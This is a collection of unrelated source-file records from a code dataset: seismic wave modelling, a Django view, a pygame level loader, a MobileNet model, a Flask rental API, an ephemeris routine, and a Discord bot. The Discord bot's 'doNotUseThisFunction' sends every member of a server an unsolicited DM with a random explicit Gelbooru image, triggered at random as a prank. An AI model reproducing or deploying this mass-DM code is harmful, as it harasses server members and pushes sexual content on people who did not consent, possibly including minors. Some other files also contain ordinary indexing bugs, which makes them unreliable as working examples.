plot shot record evolution\n ds = zeros(nt,nx);\n ds(1:i,:) = data(1:i,:);\n subplot(2,2,3)\n imagesc(x,t,ds)\n xlabel('Distance (m)'), ylabel('Time (s)')\n title('Shot Record')\n %caxis([-0.5 0.5]) % this for layered model\n caxis([-5 5]) % this for Marmousi model\n\n % plot wave propagation\n subplot(2,2,4)\n imagesc(x,z,snapshot(1:end-20,21:end-20,i))\n xlabel('Distance (m)'), ylabel('Depth (m)')\n title(['Wave Propagation t = ',num2str(t(i),'%10.3f')])\n %caxis([-5 5]) % this for layered model\n caxis([-50 50]) % this for Marmousi model\n\n\n drawnow;\n end\n end %shot loop\n \"\"\"\n return\n\n\ndef fm2d(v, model, nz, dz, nx, dx, nt, dt):\n \"\"\"\n model(nz,nx) model vector\n v(nz,nx) velocity model\n nx number of horizontal samples\n nz number of depth samples\n nt numer of time samples\n dx horizontal distance per sample\n dz depth distance per sample\n dt time difference per sample\n \"\"\"\n # add grid points for boundary condition\n # model = [repmat(model(:,1),1,20), model, repmat(model(:,end),1,20)];\n # model(end+20,:) = model(end,:);\n\n # v = [repmat(v(:,1),1,20), v, repmat(v(:,end),1,20)];\n # v(end+20,:) = v(end,:);\n\n # Initialize storage\n nz, nx = model.shape\n data = np.zeros((nx, nt))\n fdm = np.zeros((nz, nx, 3))\n\n # Boundary Absorbing Model\n iz = np.arange(1, 21)\n boundary = (np.exp(-((0.005 * (20-iz))**2)))**10.\n boundary = boundary.transpose()\n\n # Forward-Time Modeling\n fdm = np.array((model, model))\n data[:, 0] = model[0, :]\n\n # finite difference coefficients\n a = (v*dt/dx)**2 # wave equation coefficient\n b = 2-4*a\n\n # common indicies\n iz = np.arange(2, nz) # interior z\n ix = np.arange(2, nx) # interior x\n izb = np.arange(1, nz-19) # boundary z\n\n snapshot = np.zeros((nz, nx, nt))\n\n for it in np.arange(2, nt):\n # finite differencing on interior\n fdm[iz, ix, 2] = (\n b[iz, ix] * fdm[iz, ix, 1] - fdm[iz, ix, 0] +\n a[iz, ix] * (fdm[iz, ix+1, 1] + fdm[iz, ix-1, 1] +\n fdm[iz+1, ix, 1] + fdm[iz-1, ix, 1])\n )\n\n # finite differencing at ix = 1 and ix = nx (surface, bottom)\n fdm[iz, 0, 2] = (\n b[iz, 0] * fdm[iz, 0, 1] - fdm[iz, 0, 0] +\n a[iz, 0] * (fdm[iz, 1, 1] + fdm[iz+1, 0, 1] +\n fdm[iz-1, 0, 1])\n )\n\n fdm[iz, nx, 2] = (\n b[iz, nx] * fdm[iz, nx, 1] - fdm[iz, nx, 0] +\n a[iz, nx] * (fdm[iz, nx-1, 1] + fdm[iz+1, nx, 1] +\n fdm[iz-1, nx, 1])\n )\n\n # finite differencing at iz = 1 and iz = nz (z boundaries)\n fdm[0, ix, 2] = (\n b[0, ix] * fdm[0, ix, 1] - fdm[0, ix, 0] +\n a[0, ix] * (fdm[1, ix, 1] + fdm[0, ix+1, 1] +\n fdm[0, ix-1, 1])\n )\n\n fdm[nz, ix, 2] = (\n b[nz, ix] * fdm[nz, ix, 1] - fdm[nz, ix, 0] +\n a[nz, ix] * (fdm[nz-1, ix, 1] + fdm[nz, ix+1, 1] +\n fdm[nz, ix-1, 1])\n )\n\n # finite differencing at four corners (1,1), (nz,1), (1,nx), (nz,nx)\n fdm[0, 0, 2] = (\n b[0, 0] * fdm[0, 0, 1] - fdm[0, 0, 0] +\n a[0, 0] * (fdm[1, 0, 1] + fdm[0, 1, 1])\n )\n fdm[nz, 0, 2] = (\n b[nz, 0] * fdm[nz, 0, 1] - fdm[nz, 0, 0] +\n a[nz, 1] * (fdm[nz, 1, 1] + fdm[nz-1, 0, 1])\n )\n fdm[0, nx, 2] = (\n b[0, nx] * fdm[0, nx, 1] - fdm[0, nx, 0] +\n a[0, nx] * (fdm[0, nx-1, 1] + fdm[2, nx, 1])\n )\n fdm[nz, nx, 2] = (\n b[nz, nx] * fdm[nz, nx, 0] - fdm[nz, nx, 0] +\n a[nz, nx] * (fdm[nz-1, nx, 1] + fdm[nz, nx-1, 1])\n )\n\n # update fdm for next time iteration\n fdm[:, :, 0] = fdm[:, :, 1]\n fdm[:, :, 1] = fdm[:, :, 2]\n\n # apply absorbing boundary conditions to 3 sides (not surface)\n for ixb in range(1, 21):\n fdm[izb, ixb, 0] = boundary[ixb] * fdm[izb, ixb, 0]\n fdm[izb, ixb, 1] = boundary[ixb] * fdm[izb, ixb, 1]\n ixb2 = nx-20+ixb\n 
fdm[izb, ixb2, 0] = boundary[nx-ixb2+1] * fdm[izb, ixb2, 0]\n fdm[izb, ixb2, 1] = boundary[nx-ixb2+1] * fdm[izb, ixb2, 1]\n izb2 = nz-20+ixb\n fdm[izb2, :, 0] = boundary[nz-izb2+1] * fdm[izb2, :, 0]\n fdm[izb2, :, 1] = boundary[nz-izb2+1] * fdm[izb2, :, 1]\n\n # update data\n data[:, it] = fdm[0, :, 1]\n\n snapshot[:, :, it] = fdm[:, :, 1]\n\n data = data[21:nx-20, :]\n\n return data, snapshot\n","sub_path":"RTM_imaging/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"104069493","text":"from django.shortcuts import render\nfrom store.models import Product, BestProduct, TrendingProduct\n\ndef home(request):\n products = Product.objects.all().filter(is_available=True)\n bestProduct = BestProduct.objects.all().filter(is_available=True)\n trendProducts = TrendingProduct.objects.all().filter(is_available=True)\n\n context = {\n 'products' : products,\n 'bestProduct' : bestProduct,\n 'trendProducts': trendProducts,\n }\n return render(request, 'home.html', context)\n","sub_path":"Ecarts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654086815","text":"\"\"\" Setup file. \"\"\"\n\nfrom setuptools import find_packages, setup\n\nwith open(\"README.rst\", \"r\") as readme_file:\n README = readme_file.read()\n\nversion = {}\nwith open(\"src/matching/version.py\", \"r\") as f:\n exec(f.read(), version)\n\nsetup(\n name=\"matching\",\n version=version[\"__version__\"],\n description=\"A package for solving matching games.\",\n long_description=README,\n url=\"https://github.com/daffidwilde/matching\",\n author=\"Henry Wilde\",\n author_email=\"henrydavidwilde@gmail.com\",\n license=\"MIT\",\n keywords=[\"game-theory gale-shapley matching-games\"],\n packages=find_packages(\"src\"),\n package_dir={\"\": \"src\"},\n python_requires=\">=3.5\",\n tests_require=[\"pytest\", \"hypothesis\", \"numpy\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"345682174","text":"#!/usr/bin/env python\n'''\nCreated on Nov 27, 2012\n\n@author: Robert Rouhani\n@copyright: Copyright (c) 2012, Robert Rouhani\n\n@license: MIT\n@version: 0.1\n'''\n\nimport pygame\nimport entities\n\nclass Tile(object):\n def __init__(self, rect):\n self.rect = rect\n self.name = \"\"\n \n def get_rect(self):\n return self.rect\n\nclass Level(object):\n def __init__(self, path):\n self.tileset = pygame.image.load(\"../assets/img/tileset.png\").convert_alpha()\n self.spawn_x = 0\n self.spawn_y = 0\n \n lines = [line.rstrip() for line in open(path)]\n \n startmapdata = 0\n mapsize_x = 0\n mapsize_y = 0\n \n self.entities = []\n self.colliders = []\n \n for i,line in enumerate(lines):\n lineinfo = line.split(' ')\n if lineinfo[0] == \"spawn\":\n self.spawn_x = int(lineinfo[1])\n self.spawn_y = int(lineinfo[2])\n elif lineinfo[0] == \"button\":\n btn = entities.Button(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3] == \"1\", lineinfo[4])\n for name in lineinfo[5:]:\n btn.connected.append(next(e for e in self.entities if e.name == name))\n self.entities.append(btn)\n elif lineinfo[0] == \"slidingblock\":\n self.entities.append(entities.SlidingBlock(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3] == \"1\", lineinfo[4]))\n elif lineinfo[0] 
== \"floorbutton\":\n btn = entities.FloorButton(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3])\n for name in lineinfo[4:]:\n btn.connected.append(next(e for e in self.entities if e.name == name))\n elif lineinfo[0] == \"spike\":\n self.entities.append(entities.Spike(int(lineinfo[1]), int(lineinfo[2]), int(lineinfo[3]), int(lineinfo[4]), lineinfo[5]))\n elif lineinfo[0] == \"levelend\":\n self.entities.append(entities.LevelEnd(int(lineinfo[1]), int(lineinfo[2]), lineinfo[3]))\n elif lineinfo[0] == \"counter\":\n ct = entities.Counter(int(lineinfo[1]), lineinfo[2])\n for name in lineinfo[3:]:\n ct.connected.append(next(e for e in self.entities if e.name == name))\n self.entities.append(ct)\n elif lineinfo[0] == \"mapinfo\":\n mapsize_x = int(lineinfo[1])\n mapsize_y = int(lineinfo[2])\n startmapdata = i + 1\n break\n \n self.map_surface = pygame.Surface((mapsize_x * 32, mapsize_y * 32), pygame.SRCALPHA)\n \n for i,row in enumerate(lines[startmapdata:]):\n for j,col in enumerate(row):\n if col == 'n': #blank tiles\n continue\n elif col.isdigit() or col in ('a', 'b', 'c', 'd', 'e', 'f'):\n num=int(col, 16)\n if 0 <= num <= 15:\n tile_rect = pygame.rect.Rect(((num % 4) * 32, (num / 4) * 32), (32, 32))\n self.map_surface.blit(self.tileset, (j * 32, i * 32), tile_rect)\n self.colliders.append(Tile(pygame.rect.Rect((j * 32, i * 32), (32, 32))))\n elif col == 'o': #special 'o' character - visible but not collidable. Gives me more room for not having a physics broadphase.\n self.map_surface.blit(self.tileset, (j * 32, i * 32), pygame.rect.Rect(0, 0, 32, 32))\n \n self.colliders = self.colliders + self.entities #include entities as colliders\n \n def draw(self, screen):\n screen.blit(self.map_surface, (0,0))","sub_path":"src/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":3679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456151847","text":"import discord\nimport os\nimport time\nimport random\nimport requests\nimport asyncio\n\nfrom pso2 import pso2_sched\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom pygelbooru import Gelbooru\nfrom tokens import token\nfrom discord.ext import commands\nfrom pytz import timezone\n\nbots = commands.Bot(command_prefix='|')\n\ngelbooru = Gelbooru()\n\nglobal forbidden\nforbidden = False\n\njao_string = [discord.File(\"files/jao1.png\"), \n discord.File(\"files/jao2.png\")]\n\nchannel = bots.get_channel(490286224754475008) #ID\ngame = discord.Game(\"Chaser!!\")\n\npso2 = pso2_sched()\n\n@bots.event\nasync def on_ready():\n\n print(f\"Misaka Misaka is turning on!\")\n print(f\"Please wait...\")\n print(f\".\")\n time.sleep(0.1)\n print(f\".\")\n time.sleep(0.3)\n print(f\".\")\n time.sleep(0.6)\n print(f\"Misaka Misaka is on!\")\n\n await bots.change_presence(status=discord.Status.idle, activity=game)\n pass\n\n@bots.command(pass_context=True)\nasync def load(ctx, arg1):\n\n voiceConnect = discord.utils.get(bots.voice_clients, guild=ctx.guild)\n\n try:\n authorVoice = ctx.author.voice.channel\n except AttributeError:\n await ctx.send(\"Entra numa call desgraça\")\n return\n\n if (arg1 == \"carnaval\"):\n\n if (voiceConnect and voiceConnect.is_connected()):\n await voiceConnect.move_to(authorVoice)\n\n voiceConnect = await authorVoice.connect()\n\n await ctx.send(\" \" + \n \"<:cd:684755845891883032>*AGORA TOCANDO NA RÁDIO*<:cd:684755845891883032>\" \n + '\\n' + \"<:fire:684755845891883032>CARNAVAL PROFUNDO<:fire:684755845891883032>\"\n + '\\n' \n + 
\"<:bee:684756689907351589>BY SINGA DESGRAÇADÃO<:bee:684756689907351589>\")\n\n time.sleep(3)\n voiceConnect.play(discord.FFmpegPCMAudio('files/deep_carnival.mp3'))\n voiceConnect.source = discord.PCMVolumeTransformer(voiceConnect.source)\n voiceConnect.source.volume = 0.5\n time.sleep(3)\n \n if (arg1 == \"exit\"):\n if (voiceConnect and voiceConnect.is_connected()):\n await voiceConnect.disconnect()\n else:\n await ctx.send.img(\"Entra numa call primeiro porra\")\n\n@bots.event\nasync def on_message(message):\n\n global forbidden\n\n await bots.process_commands(message)\n ranInt = random.randint(0, 1000)\n atenaTest = bots.get_guild(413013924515151873)\n\n # Observes the current number\n print(str(message.author) + \": \" + str(ranInt))\n\n if (\"vishnu-flynn\" in message.content.lower()):\n await message.channel.send(\"https://youtu.be/GonRGr9fp40\")\n elif (\"cold steel\" in message.content.lower() and ranInt >= 50):\n await message.add_reaction(\"🤢\")\n await message.channel.send(\"Cala a boca, CSfag\")\n elif (\"singa\" in message.content.lower() and message.author.id != 635128664144609281):\n await message.add_reaction(\"🐝\")\n await message.channel.send(\"YourVinished escreveu: \\n\" +\n \"LOL imagine liking singa \")\n elif (\"test\" in message.content.lower() and message.author.id == 151487135201886209):\n pso2.get_current_schedule()\n pso2.read_current_schedule()\n pso2.read_schedule_table()\n await message.channel.send(embed=pso2_embed(\"Portugal\"))\n \n #if (message.content.lower() == \"aoi\"):\n # await message.channel.send(\"TOKI EGAKU KISEKI TADORI\")\n #if (message.content.lower() == \"kotae sagasu\"):\n # await message.channel.send(\"ONAJI SORA MIAGENAAAAGARA\")\n #if (message.content.lower() == \"kotae sagasu\"):\n # await message.channel.send(\"ONAJI SORA MIAGENAAAAGARA\")\n #if (message.content.lower() == \"mune ni\"):\n # await message.channel.send(\"HIMETA OMOI AFUUUUREDASHI\")\n #if (message.content.lower() == \"sora o kakete\"):\n # await message.channel.send(\"GIIIN IRO NO YA NI KAWAAAARU\")\n #if (message.content.lower() == \"motomeau\"):\n # await message.channel.send(\"KOKORO GA\")\n #if (message.content.lower() == \"tagau\"):\n # await message.channel.send(\"ITAMI WA\")\n #if (message.content.lower() == \"shinjitsu no\"):\n # await message.channel.send(\"MICHI KASUMASERUUUUUU KEREDOOOOO\")\n #if (message.content.lower() == \"kousa suru gin no ya\"):\n # await message.channel.send(\"MITSUMEAU HITOMI NI\") \n #if (message.content.lower() == \"onaji yume\"):\n # await message.channel.send(\"TASHIKA NI, UTSUSHITA\")\n #if (message.content.lower() == \"tatoe tsumazuite mo\"):\n # await message.channel.send(\"TATOE KIZU TSUITE MOOOOOOOOOOOO\")\n #if (message.content.lower() == \"tobitatou\"):\n # await message.channel.send(\"KAZE TSUBASA NIIIIIIII SHITEEEEEEEE\")\n #if (message.content.lower() == \"hi o ukete kagayaku\"):\n # await message.channel.send(\"KIN IRO NO TSUBASA WAAAAAA\")\n #if (message.content.lower() == \"sora ni egaku\"):\n # await message.channel.send(\"INOCHI NO, KISEKI OOOOOO\") \n\n if (ranInt == random.randint(0, 1000) and message.guild.id == 413013924515151873 and not forbidden):\n forbidden = True\n await message.channel.send(\"<:trollface_insano_psicopata:685671384109940737> time to take a Piss\")\n await doNotUseThisFunction(atenaTest)\n forbidden = False\n\nasync def doNotUseThisFunction(guild):\n allMembers = guild.members\n\n for mem in allMembers:\n\n if mem.id == 635128664144609281:\n continue\n\n try:\n memChannel = await 
mem.create_dm()\n except:\n print(\"\\n--SERVERWIDE_IMG ~ Could not create a DM with \" + mem + \".\\n\")\n continue\n\n result = await gelbooru.random_post(tags=['futanari'])\n\n generateImage(result)\n\n if (random.randint(1, 10) >= 5):\n imgChoice = \"files/ben.png\"\n else: \n imgChoice = \"files/image.jpg\"\n\n try:\n await memChannel.send(file=discord.File(imgChoice, spoiler=True))\n except:\n print(\"\\n--SERVERWIDE_IMG ~ Could not send image to \" + mem + \".\\n\")\n continue\n\n print(\"\\n--SERVERWIDE_IMG ~ Sent random image to \" + mem + \".\\n\")\n\ndef pso2_embed(current_timezone):\n\n times = [\n (00, 00), (00, 30), (1, 00), (1, 30), (2, 00), (4, 30), (5, 00), (5, 30),\n (6, 00), (6, 30), (10, 00), (10, 30), (11, 00), (11, 30), (12, 00), (12, 30),\n (14, 00), (14, 30), (15, 00), (15, 30), (16, 00), (16, 30), (19, 00), (19, 30),\n (20, 00), (20, 30), (21, 00), (21, 30), (22, 00), (22, 30)\n ]\n\n updated_times = []\n\n for time in times:\n updated_times.append(datetime(2020, 1, 1, time[0], time[1], tzinfo=timezone('PST8PDT')).astimezone(timezone(current_timezone)).strftime(\"%H:%M\"))\n\n embed=discord.Embed(title=\"August 2020\", description= current_timezone + \" Timezone (Times may 'overflow' the date.)\", color=0x00b3ff)\n embed.set_author(name=\"Current Month's Schedule for PSO2's Events\", icon_url=\"https://www.trueachievements.com/achievementimages/8339/294405.jpg\")\n embed.set_thumbnail(url=\"https://pbs.twimg.com/profile_images/1205616012478971904/xJO1qWcf.jpg\")\n embed.add_field(name=\"\\n**Week 1**\", value=\"\\u200b\", inline=False)\n #embed.set_image()\n embed.set_footer(text=\"I fucking HATE you.\")\n\n return embed\n\ndef generateImage(link):\n\n with requests.get(link) as jeff:\n imageData = jeff.content\n\n with open(\"./files/image.jpg\", \"wb\") as handler:\n handler.write(imageData)\n \nbots.run(token)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"443706413","text":"import torch.nn as nn\n\n\nclass DepthwisePointwiseConv(nn.Module):\n def __init__(self, in_channels, out_channels, stride=1):\n super().__init__()\n\n self.depthwise = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, 3, groups=in_channels, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU()\n )\n self.pointwise = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU()\n )\n\n def forward(self, x):\n output = self.depthwise(x)\n output = self.pointwise(output)\n\n return output\n\n\nclass MobileNet(nn.Module):\n def __init__(self, num_class=10):\n super().__init__()\n\n self.conv_input = nn.Sequential(\n nn.Conv2d(3, 32, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(32),\n nn.ReLU()\n )\n self.dp1 = DepthwisePointwiseConv(32, 64)\n self.dp2 = nn.Sequential(\n DepthwisePointwiseConv(64, 128, 2),\n DepthwisePointwiseConv(128, 128)\n )\n self.dp3 = nn.Sequential(\n DepthwisePointwiseConv(128, 256, 2),\n DepthwisePointwiseConv(256, 256)\n )\n self.dp4 = nn.Sequential(\n DepthwisePointwiseConv(256, 512, 2),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512),\n DepthwisePointwiseConv(512, 512)\n )\n self.dp5 = nn.Sequential(\n DepthwisePointwiseConv(512, 1024, 2),\n DepthwisePointwiseConv(1024, 1024)\n )\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n 
self.fc = nn.Linear(1024, num_class)\n\n def forward(self, x):\n output = self.conv_input(x)\n output = self.dp1(output)\n output = self.dp2(output)\n output = self.dp3(output)\n output = self.dp4(output)\n output = self.dp5(output)\n output = self.avg_pool(output)\n output = output.reshape(output.size(0), -1)\n output = self.fc(output)\n\n return output\n","sub_path":"classification/network/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"138988402","text":"import re\nfrom app import db\nfrom app.models.customer import Customer\nfrom datetime import datetime\nfrom flask import request, Blueprint, make_response, jsonify\nimport requests\nimport os\nfrom app.models.video import Video\nfrom app.models.rental import Rental\n\n\nvideos_bp = Blueprint(\n \"videos\", __name__, url_prefix=\"/videos\")\ncustomers_bp = Blueprint(\n \"customers\", __name__, url_prefix=\"/customers\")\nrentals_bp = Blueprint(\n \"rentals\", __name__, url_prefix=\"/rentals\")\n\n\n# ----------------------------\n# WAVE 1 - CUSTOMER ENDPOINTS\n# ----------------------------\n\n@customers_bp.route(\"\", methods=[\"GET\"], strict_slashes=False)\ndef customer_index():\n customers = Customer.query.all()\n customers_response = [(customer.to_json()) for customer in customers]\n return make_response(jsonify(customers_response), 200)\n\n\n@customers_bp.route(\"\", methods=[\"POST\"], strict_slashes=False)\ndef create_customer():\n request_body = request.get_json()\n if \"name\" in request_body and \"postal_code\" in request_body and \"phone\" in request_body:\n new_customer = Customer(\n name=request_body[\"name\"],\n postal_code=request_body[\"postal_code\"],\n phone=request_body[\"phone\"],\n registered_at=datetime.now()\n )\n db.session.add(new_customer)\n db.session.commit()\n customer_response = {\"id\": new_customer.customer_id}\n return jsonify(customer_response), 201\n # return jsonify(new_customer.to_json()), 201\n return make_response({\"details\": \"You must include a name, postal code, and phone number\"}, 400)\n\n\n@customers_bp.route(\"/<customer_id>\", methods=[\"GET\"], strict_slashes=False)\ndef get_one_customer(customer_id):\n customer = Customer.query.get(customer_id)\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n return jsonify(customer.to_json()), 200\n\n\n@customers_bp.route(\"/<customer_id>\", methods=[\"PUT\"], strict_slashes=False)\ndef update_customer(customer_id):\n customer = Customer.query.get(customer_id)\n form_data = request.get_json()\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n elif \"name\" in form_data and \"postal_code\" in form_data and \"phone\" in form_data:\n customer.name = form_data[\"name\"]\n customer.postal_code = form_data[\"postal_code\"]\n customer.phone = form_data[\"phone\"]\n db.session.commit()\n return jsonify(customer.to_json()), 200\n # an incomplete JSON body falls through to a 400\n return make_response({\"details\": \"Bad Request\"}, 400)\n\n\n@customers_bp.route(\"/<customer_id>\", methods=[\"DELETE\"], strict_slashes=False)\ndef delete_customer(customer_id):\n customer = Customer.query.get(customer_id)\n if customer is None:\n return make_response(\"Customer does not exist\", 404)\n db.session.delete(customer)\n db.session.commit()\n # return jsonify(customer.to_json()), 200\n customer_response = {\"id\": customer.customer_id}\n return jsonify(customer_response), 200\n\n\n# --------------------------\n# WAVE 1 - 
VIDEO ENDPOINTS\n# --------------------------\n\n@videos_bp.route(\"\", methods=[\"GET\"], strict_slashes=False)\ndef video_index():\n videos = Video.query.all()\n videos_response = [(video.to_dict()) for video in videos]\n return make_response(jsonify(videos_response), 200)\n\n\n@videos_bp.route(\"\", methods=[\"POST\"], strict_slashes=False)\ndef create_video():\n request_body = request.get_json()\n if \"title\" in request_body and \"release_date\" in request_body and \"total_inventory\" in request_body:\n new_video = Video(\n title=request_body[\"title\"],\n release_date=request_body[\"release_date\"],\n total_inventory=request_body[\"total_inventory\"],\n available_inventory=request_body[\"total_inventory\"]\n )\n db.session.add(new_video)\n db.session.commit()\n # video_response = {\"id\": new_video.video_id}\n return jsonify({\"id\": new_video.video_id}), 201\n # return jsonify(new_video.to_dict()), 201\n return make_response({\"details\": \"You must include a title, release date, and total inventory\"}, 400)\n\n\n@videos_bp.route(\"/<video_id>\", methods=[\"GET\"], strict_slashes=False)\ndef get_one_video(video_id):\n video = Video.query.get(video_id)\n if video is None:\n return make_response(\"Video does not exist\", 404)\n return jsonify(video.to_dict()), 200\n\n\n@videos_bp.route(\"/<video_id>\", methods=[\"PUT\"], strict_slashes=False)\ndef update_video(video_id):\n video = Video.query.get(video_id)\n form_data = request.get_json()\n if video is None:\n return make_response(\"Video does not exist\", 404)\n elif \"title\" in form_data and \"release_date\" in form_data and \"total_inventory\" in form_data:\n video.title = form_data[\"title\"]\n video.release_date = form_data[\"release_date\"]\n video.total_inventory = form_data[\"total_inventory\"]\n db.session.commit()\n return jsonify(video.to_dict()), 200\n return make_response(\"Bad Request\", 400)\n\n\n@videos_bp.route(\"/<video_id>\", methods=[\"DELETE\"], strict_slashes=False)\ndef delete_video(video_id):\n video = Video.query.get(video_id)\n if video is None:\n return make_response(\"Video does not exist\", 404)\n db.session.delete(video)\n db.session.commit()\n # return jsonify(video.to_dict()), 200\n # video_response = {\"id\": video.video_id}\n return jsonify({\"id\": video.video_id}), 200\n\n\n# ----------------------------------\n# WAVE 2 - (mostly) RENTAL ENDPOINTS\n# ----------------------------------\n\n@rentals_bp.route(\"/check-out\", methods=[\"POST\"], strict_slashes=False)\ndef checking_out():\n request_body = request.get_json()\n # Cast the ids to int; malformed values are rejected below.
\n try:\n video_id = int(request_body[\"video_id\"])\n customer_id = int(request_body[\"customer_id\"])\n except (ValueError, KeyError):\n return make_response({\"details\": \"The customer or video does not exist\"}, 400)\n video = Video.query.get_or_404(request_body[\"video_id\"])\n customer = Customer.query.get_or_404(request_body[\"customer_id\"])\n if video.available_inventory < 1:\n return make_response({\"details\": \"This video doesn't have any current available inventory\"}, 400)\n elif \"customer_id\" in request_body and \"video_id\" in request_body:\n # date = Rental.date_due()\n new_rental = Rental(\n customer_id=request_body[\"customer_id\"],\n video_id=request_body[\"video_id\"],\n )\n customer.videos_checked_out_count += 1\n video.available_inventory -= 1\n db.session.add_all([new_rental, video, customer])\n db.session.commit()\n return ({\n \"customer_id\": customer.customer_id,\n \"video_id\": video.video_id,\n \"due_date\": new_rental.due_date,\n \"videos_checked_out_count\": customer.videos_checked_out_count,\n \"available_inventory\": video.available_inventory\n }, 200)\n return make_response({\"details\": \"Invalid required request body parameters\"}, 400)\n\n\n@rentals_bp.route(\"/check-in\", methods=[\"POST\"], strict_slashes=False)\ndef checking_in():\n request_body = request.get_json()\n video = Video.query.get_or_404(request_body[\"video_id\"])\n customer = Customer.query.get_or_404(request_body[\"customer_id\"])\n if \"customer_id\" in request_body and \"video_id\" in request_body:\n customer.videos_checked_out_count -= 1\n video.available_inventory += 1\n ###\n rental = Rental.query.filter_by(\n video_id=request_body[\"video_id\"], customer_id=request_body[\"customer_id\"]).one_or_none()\n if rental is None:\n return make_response({\"details\": \"The video and customer do not match a current rental\"}, 400)\n db.session.delete(rental)\n db.session.add_all([video, customer])\n db.session.commit()\n return ({\n \"customer_id\": customer.customer_id,\n \"video_id\": video.video_id,\n \"videos_checked_out_count\": customer.videos_checked_out_count,\n \"available_inventory\": video.available_inventory\n }), 200\n # if video is None or customer is None:\n # return make_response({\"details\": \"The customer or video does not exist\"}, 404)\n return make_response({\"details\": \"Invalid required request body parameters\"}, 400)\n\n\n@customers_bp.route(\"/<customer_id>/rentals\", methods=[\"GET\"], strict_slashes=False)\ndef get_videos_of_customer(customer_id):\n # request_body = request.get_json()\n rentals = Rental.query.filter(Rental.customer_id == customer_id).all()\n if rentals is None:\n return make_response({\"details\": \"Customer does not exist\"}, 404)\n list_of_rentals = []\n for rental in rentals:\n video = Video.query.get(rental.video_id)\n list_of_rentals.append({\n \"release_date\": video.release_date,\n \"title\": video.title,\n \"due_date\": rental.due_date})\n return jsonify(list_of_rentals), 200\n\n\n@videos_bp.route(\"/<video_id>/rentals\", methods=[\"GET\"], strict_slashes=False)\ndef get_customers_of_video(video_id):\n rentals = Rental.query.filter(Rental.video_id == video_id).all()\n if rentals is None:\n return make_response({\"details\": \"Video does not exist\"}, 404)\n list_of_customers = []\n for rental in rentals:\n customer = Customer.query.get(rental.customer_id)\n list_of_customers.append({\n \"due_date\": rental.due_date,\n \"name\": customer.name,\n \"phone\": customer.phone,\n \"postal_code\": int(customer.postal_code)})\n return 
jsonify(list_of_customers), 200\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"14492437","text":"# Monster Ephem Gen.\r\n# Grace Xin\r\n\r\nimport numpy as np\r\nfrom math import *\r\n\r\ndef findQuadrant(sine, cosine):\r\n if cosine > 0 and sine > 0: #1\r\n return asin(sine)\r\n\r\n if cosine < 0 and sine > 0: #2\r\n return acos(cosine)\r\n\r\n if cosine < 0 and sine < 0: #3\r\n return pi - asin(sine)\r\n\r\n if cosine > 0 and sine < 0: #4\r\n return 2*pi + asin(sine)\r\n\r\n# Ephemeris Generation\r\ndef RA_DEC(e, a, I, OM, om, M, ind, t, R):\r\n t0 = JDs[ind]\r\n \r\n sqrtMu = 0.01720209895\r\n mu = sqrtMu**2\r\n \r\n n = sqrtMu/(a**1.5)\r\n \r\n # calculate M\r\n M = M - n*(JDs[2]-t0)\r\n\r\n # calculate E\r\n prevGuess = M\r\n currGuess = M\r\n while True:\r\n currGuess = M+e*sin(prevGuess)\r\n if(abs(currGuess-prevGuess) < 10**-12):\r\n break\r\n prevGuess = currGuess \r\n E = currGuess\r\n\r\n # calculate physics x, y (z = 0)\r\n z = 0\r\n x = a*(cos(E)-e)\r\n y = a*sin(E)*sqrt(1-e**2)\r\n r = sqrt(x**2+y**2)\r\n phys_coords = [x, y, z]\r\n cosnu = x/r\r\n sinnu = y/r\r\n nu = findQuadrant(sinnu, cosnu)\r\n \r\n # calculate ecliptic\r\n R1 = np.array([[cos(om), -sin(om), 0],\r\n [sin(om), cos(om), 0],\r\n [0, 0, 1]])\r\n R2 = np.array([[1, 0, 0 ],\r\n [0, cos(I), -sin(I)],\r\n [0, sin(I), cos(I) ]])\r\n R3 = np.array([[cos(OM), -sin(OM), 0],\r\n [sin(OM), cos(OM), 0],\r\n [0, 0, 1]])\r\n ecliptic = np.matmul(R3, np.matmul(R2, np.matmul(R1, phys_coords)))\r\n \r\n # repeat (1) - (5) for Earth to get\r\n Xe = R[0]\r\n Ye = R[1]\r\n Ze = R[2]\r\n\r\n # get Earth to asteroid rho\r\n rho = ecliptic + R\r\n rho_x = ecliptic[0] + Xe\r\n rho_y = ecliptic[1] + Ye\r\n rho_z = ecliptic[2] + Ze\r\n\r\n # convert ecliptic rho's to equatorial rho's\r\n EQ_rho_x = rho_x\r\n epsolon = radians(23.4358)\r\n EQ_rho_y = rho_y*cos(epsolon) - rho_z*sin(epsolon)\r\n EQ_rho_z = rho_y*sin(epsolon) + rho_z*cos(epsolon)\r\n EQ_rho = [EQ_rho_x, EQ_rho_y, 